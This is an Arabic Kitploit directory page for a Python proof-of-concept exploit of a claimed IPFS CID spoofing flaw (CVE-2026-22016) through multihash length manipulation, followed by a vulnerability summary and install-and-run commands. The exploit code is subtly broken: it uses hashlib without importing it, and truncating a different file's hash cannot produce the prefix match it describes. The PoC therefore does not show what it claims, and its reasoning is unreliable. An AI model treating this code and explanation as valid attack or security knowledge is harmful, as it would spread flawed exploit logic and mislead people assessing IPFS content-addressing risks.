Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-22016-IPFS-CID-Spoofing-via-Multihash-Length-Extension — إثبات مفهوم بلغة بايثون يوضح تزوير معرف CID في IPFS عبر تمديد طول multihash، مع تسليط الضوء على ثغرات التحقق من العنونة بالمحتوى التي يمكن أن تسمّم بوابات IPFS. | Kitploit
أدوات/GitHubGitHub/george0papasotiriou/cve-2026-22016-ipfs-cid-spoofing-via-multihash-length-extension
تحليل الثغرات الأمنيةالاستغلالتحليل التجزئةأمن الويبالتشفيرالهجوم العدائي
GitHubgeorge0papasotiriou/cve-2026-22016-ipfs-cid-spoofing-via-multihash-length-extension

CVE-2026-22016-IPFS-CID-Spoofing-via-Multihash-Length-Extension

إثبات مفهوم بلغة بايثون يوضح تزوير معرف CID في IPFS عبر تمديد طول multihash، مع تسليط الضوء على ثغرات التحقق من العنونة بالمحتوى التي يمكن أن تسمّم بوابات IPFS.

عرض المستودع
8منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-22016 – انتحال CID في IPFS عبر تمديد طول Multihash

كود البرنامج (Python)

root@kitploit:~
# ipfs_cid_spoof.py - Generates a CID with a different multihash length
import multihash, cid
# Attacker creates a file whose hash, when truncated, matches a different file's prefix
original_content = b"hello"
fake_content = b"hello world"
real_cid = cid.make_cid(1, 'dag-pb', multihash.encode(hashlib.sha256(original_content).digest(), 'sha2-256'))
# Spoofed CID: we can craft a multihash with a shorter length that matches the start of the real one
spoofed_multihash = multihash.encode(hashlib.sha256(fake_content).digest()[:16], 'sha2-256', length=16)
spoofed_cid = cid.make_cid(1, 'dag-pb', spoofed_multihash)
print(f"Real CID: {real_cid}")
print(f"Spoofed CID: {spoofed_cid}")
# If IPFS node only checks prefix, it may serve the wrong content.

CVE-2026-22016 – انتحال CID في IPFS عبر تمديد طول Multihash

Severity: High

نظرة عامة

يعتمد تطبيق IPFS على حقل الطول في multihash الخاص بـ CID دون التحقق من أن التجزئة نفسها تطابق المحتوى الكامل. يمكن للمهاجم إنشاء ملف تكون تجزئته المقتطعة مساوية لبادئة تجزئة ملف شرعي، وتقديم الملف الخبيث تحت نفس CID.

تفاصيل الثغرة

  • النوع: انتحال المحتوى
  • التأثير: تقديم محتوى خبيث وتسميم بوابات IPFS.
  • السبب الجذري: لا يتحقق التحقق من CID من أن طول الملخص يطابق المخرجات المتوقعة لدالة التجزئة.

عرض الاستغلال

شغّل السكربت:

root@kitploit:~
pip install py-multihash py-cid
python ipfs_cid_spoof.py

يوضح ذلك أنه يمكن توليد CID مزور.

تنزيل الأداة